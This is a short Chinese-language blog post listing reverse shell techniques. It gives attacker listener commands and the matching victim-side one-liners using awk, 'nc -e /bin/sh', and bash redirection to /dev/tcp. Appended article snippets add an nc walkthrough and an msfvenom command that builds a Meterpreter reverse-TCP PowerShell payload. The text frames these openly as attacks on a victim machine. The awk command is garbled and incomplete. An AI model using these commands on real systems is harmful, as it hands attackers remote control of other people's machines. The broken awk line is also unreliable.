反彈shell方法記錄

2022-07-06 01:27:08 字數 635 閱讀 9205

一、基於awk

hacker機器上執行命令:

nc -l port

hacker機器一直監聽某埠。

在受害主機上執行命令:

awk 'begin  } while(c != "exit") close(s); }}' /dev/n

受害主機主動向hacker傳送shell連線。

二、純nc

hacker機器上執行命令:

nc -l port

hacker機器一直監聽某埠。

在受害主機上執行命令:

nc -e /bin/sh hackerhostip port

受害主機主動向hacker傳送shell連線。

三、萬能

hacker機器上先執行命令:

nc -l port

hacker機器一直監聽某埠。

在受害主機上執行命令:

bash -i >& /dev/tcp/hackerhostip/port 0>&1

受害主機主動向hacker傳送shell連線。

注:有時受害主機上可能會缺少我們需要的軟體,如nc一類的。

反彈shell集錦

就是控制端監聽在某tcp udp埠,被控端發起請求到該埠,並將其命令列的輸入輸出轉到控制端。reverse shell與telnet,ssh等標準shell對應,本質上是網路概念的客戶端與服務端的角色反轉。通常用於被控端因防火牆受限 許可權不足 埠被占用等情形 假設我們攻擊了一台機器,開啟了該機器的...

使用NC命令反彈Shell

本文使用兩台電腦操作,一台是kali 192.168.0.23 一台是mac 192.168.0.24 有些電腦不支援,而且跟機器使用順序還有關係。比如我在kali上 192.168.0.23 輸入 root kali nc l 1234在mac上 192.168.0.24 輸入 nc 192.16...

msf反彈shell內網滲透

1.msfvenom p windows x64 meterpreter reverse tcp lhost 本機ip位址 lport 本機監聽埠 f psh reflection o xx.ps1 生成檔案放在目標機目錄下 powershell執行指令碼 powershell windowstyl...